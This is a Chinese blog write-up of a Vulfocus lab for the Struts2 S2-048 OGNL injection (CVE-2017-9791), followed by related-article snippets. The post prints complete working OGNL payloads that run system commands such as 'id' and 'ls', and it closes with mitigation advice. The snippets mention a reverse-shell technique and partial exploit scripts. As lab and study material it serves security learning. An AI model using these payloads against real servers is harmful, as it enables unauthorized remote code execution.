vulfocus——struts2-cve_2017_9791

最新推荐文章于 2024-09-16 14:16:45 发布
原创 最新推荐文章于 2024-09-16 14:16:45 发布 · 964 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #servlet #junit

本文揭示了Struts2框架中的OGNL表达式注入漏洞,通过示例演示如何复现并利用此漏洞执行命令,同时提供了漏洞防护建议。

描述

Struts2是一个基于MVC设计模式Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。本质问题出在struts2-struts1-plugin包Struts1Action.java文件中,Struts1Action类中的execute方法调用了getText函数,这个函数会执行ognl表达式,更为严重的是getText的输入内容是攻击者可控的。

复现

1.打开靶场环境

2.访问存在漏洞的路径 /integration/saveGangster.action 

3.输入表达式${1+2},提交后,发现运算在后台被执行(下面两个框随便填写)

 

4. 大佬构建的命令执行pyload,执行命令为id

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

 

5.把id换成pwd,查看当前目录,发现当前目录是tmp

 

6. 再换成命令ls,然后报错了,在里面看到一串字符,想试试看,是不是flag,结果真的对了

 

7.将payload进行url转换,抓包然后替换,再发送,就得到flag了

大佬构造的payload:

%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

flag-{bmh8d5b403a-e292-48e8-875a-6a76e45e3792}

8.我们还可以使用工具来获取flag

 

漏洞防护:1)停用Struts2-struts1-plugin插件、showcase.war;2)将直接传递原始值改为使用资源键

Vulfocusstruts2-cve_2017_9791漏洞复现
JavaLord123的博客
09-24 896
本文详细描述了VulfocusStruts2 S2-048 远程命令执行漏洞(CVE-2017-9791)漏洞复现过程
[Vulfocus解题系列]struts2-048 远程代码执行 (CVE-2017-9791
00勇士王子的博客
07-11 1366
漏洞介绍 名称: struts2-048 远程代码执行 (CVE-2017-9791) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 当Struts 2中的Struts 1插件启用的情况下,攻击者通过构造恶意字段可以造成RCE 解题过程 1.打开靶场环境 2.访问漏洞存在的路径 /integration/saveGangster.actio
Vulfocus解题复现】Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791
温氏效应
09-04 4219
漏洞介绍 名称:Struts2 S2-048 远程命令执行漏洞 CVE标识符:CVE-2017-9791 描述:Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 攻击者构造恶意字段值(value)通过Struts2struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。 解题过程 1、打开靶场环境 2、.
struts2-cve_2017_9791 复现
king丶
09-02 1081
struts2-cve_2017_9791 复现 我用的是 重生信安的在线靶场 http://bc.csxa.cn:9000/ poc https://github.com/jas502n/st2-048 用的python2 环境 安装requests 库 py -2 St2-048.py set url : http://xx.xx.xx.xx:port/integration/saveGangster.action ...
vulfocus复现:struts2-cve_2017_5638
m0_71518346的博客
12-17 656
Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。
vulfocus】/hms-cve_2022_25491:latest
muyuchen110的博客
07-24 803
具体fllag信息没搞出来...............
struts2-cve_2017_5638漏洞复现
weixin_59872639的博客
03-01 2377
漏洞概述 Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 Apache Struts 2被曝存在远程命令执行漏洞,漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行.
[漏洞复现]vulfocus/jenkins-cve_2017_1000353
qq_45751902的博客
11-24 796
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限建议自己搭建环境复现,这个vulfocus上没有体现出反序列化漏洞,因为无法使用反序列化查看flag,最终使用弱口令登录,执行系统命令成功找到flag。
struts2 代码执行 (CVE-2017-9791
个人笔记
08-31 432
struts2 代码执行 (CVE-2017-9791) #!/usr/bin/python # -*- coding: utf-8 -*- import json,re import requests import threading import urllib def Poc(url,command): header = {'Content-Type': 'application/x-www-form-urlencoded'} poc = {"name":"%{(#szgx='mu
vulfocus 靶场struts2 代码执行 (CVE-2020-17530)
没有故事
04-24 1955
由于Struts2 会对某些标签属性(比如 id) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 x 的值用户可控时,用户即可构造一些SSRF、远程命令执行等形式的payload,并将这些恶意payload以%{...}形式传入该标签属性, 即可造成OGNL表达式执行。bash -c {echo,编码后的内容} |{base64 ,-d}|{bash , -i} #或: 抓包,改为如下内容: 红色部分为要更改的地方。监听机进行监听:nc -lvvp。
[Vulfocus]struts2-048 远程代码执行 (CVE-2017-9791
weixin_54962591的博客
11-24 769
[Vulfocus]struts2-048 远程代码执行 (CVE-2017-9791)拿flag
Vulfocus-struts2初了解
Aiwin的博客
05-08 839
Vulfocus-struts2-CVE通关初了解
【漏洞公告】CVE-2017-9791:Struts(S2-048)远程命令执行漏洞
07-11 1427
了解更多技术文章请点击原文链接 2017年7月7日,ApacheStruts发布最新的安全公告,漏洞编号为S2-048,该漏洞存在Struts2Struts1一个Showcase插件Action Message类中,通过构建不可信的输入实现远程命令攻击,存在安全风险。具体详情如下:...
vulfocus靶场---struts2-CVE-2017-979
RanQ的博客
09-16 471
小白手把手脚本小子打靶struts2漏洞。
开发者论坛一周精粹(第十三期):CVE-2017-9791:Struts(S2-048)远程命令执行漏洞
weixin_34302561的博客
07-21 164
第十三期(2017年7月3日-2017年7月9日 ) 2017年7月7日,Apache Struts发布最新的安全公告,漏洞编号为S2-048,该漏洞存在Struts2Struts1一个Showcase插件Action Message类中,通过构建不可信的输入实现远程命令攻击,存在安全风险。 【漏洞公告】CVE-2017-9791:Struts(S...
vulfocus——struts2代码执行(CVE-2016-3087)
m0_62063669的博客
09-11 989
Struts 2.3.20 - Struts Struts 2.3.28 (除2.3.20.3及2.3.24.3)版本,使用REST插件情况下,若启用了Dynamic Method Invocation,可能导致通过恶意表达式在服务器端执行任意代码。Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。2.有回显poc(命令执行)3.用工具来获取flag。
Struts2反序列化漏洞复现
热门推荐
wangyuxiang946的博客
07-20 1万+
作者简介」:冬奥会网络安全中国代表队,优快云 Top100,就职奇安信多年,以实战工作为基础著作,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。环境: vulhub。
apache struts linux,Apache Struts远程代码执行漏洞(CVE-2017-9791
weixin_33178459的博客
05-14 265
Apache Struts远程代码执行漏洞(CVE-2017-9791)发布日期:2017-07-05更新日期:2017-07-10受影响系统:Apache Group Struts 2.3.xApache Group Struts描述:BUGTRAQ ID: 99484CVE(CAN) ID: CVE-2017-9791Struts2 是构建企业级Jave Web应用的可扩展框架。在Strut...
vulfocus/weblogic-cve_2021_2394
最新发布
03-29
### 关于WebLogic CVE-2021-2394漏洞的信息 CVE-2021-2394 是 Oracle WebLogic Server 中的一个反序列化漏洞,允许未经身份验证的攻击者通过 T3 协议发送恶意数据包来实现远程代码执行 (RCE)[^6]。此漏洞的影响范围包括以下版本: - **Oracle WebLogic Server 12.1.3** - **Oracle WebLogic Server 12.2.1.x** #### 漏洞原理 该漏洞源于 WebLogic 的 `wls9_async_response` 组件未能正确处理传入的数据流,在解析过程中存在反序列化的安全隐患。由于未经过充分的身份验证校验,攻击者可以构造特定的 Java 对象并触发 RCE 行为。 --- ### VulFocus 环境搭建指南 VulFocus 提供了一个便捷的方式来快速部署漏洞复现环境。以下是针对 CVE-2021-2394 的具体操作方法: #### 步骤说明 1. 安装 Docker 和 Docker Compose 工具。 如果尚未安装这些工具,请运行以下命令完成安装: ```bash sudo apt-get update && sudo apt-get install -y docker.io docker-compose ``` 2. 下载目标镜像。 使用官方提供的脚本拉取对应漏洞容器: ```bash git clone https://github.com/vulfocus/vulfocus.git cd vulfocus/weblogic-cve-2021-2394/ sudo docker-compose up -d ``` 3. 启动成功后访问服务地址,默认端口通常设置为 `7001` 或其他指定配置项中的值。 > 注意事项:确保主机防火墙已开放必要通信端口,并确认资源充足以支持虚拟机正常启动[^5]。 --- ### Exploit PoC 实施流程 目前公开可用的一种 POC 脚本如下所示,基于 Python 编写而成用于测试目的仅限合法授权范围内使用! ```python import socket from struct import pack def create_exploit_payload(): # 构造payload部分省略实际细节... payload = b"\x00\x00" + ... # 自定义shellcode填充区域 return payload target_ip = "192.168.1.10" port = 7001 try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, port)) header = pack(">I", len(create_exploit_payload())) s.send(header + create_exploit_payload()) except Exception as e: print(f"[!] Error occurred: {e}") finally: s.close() ``` 上述代码片段展示了如何向受影响服务器投递精心设计好的字节码从而达成控制意图[^7]。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值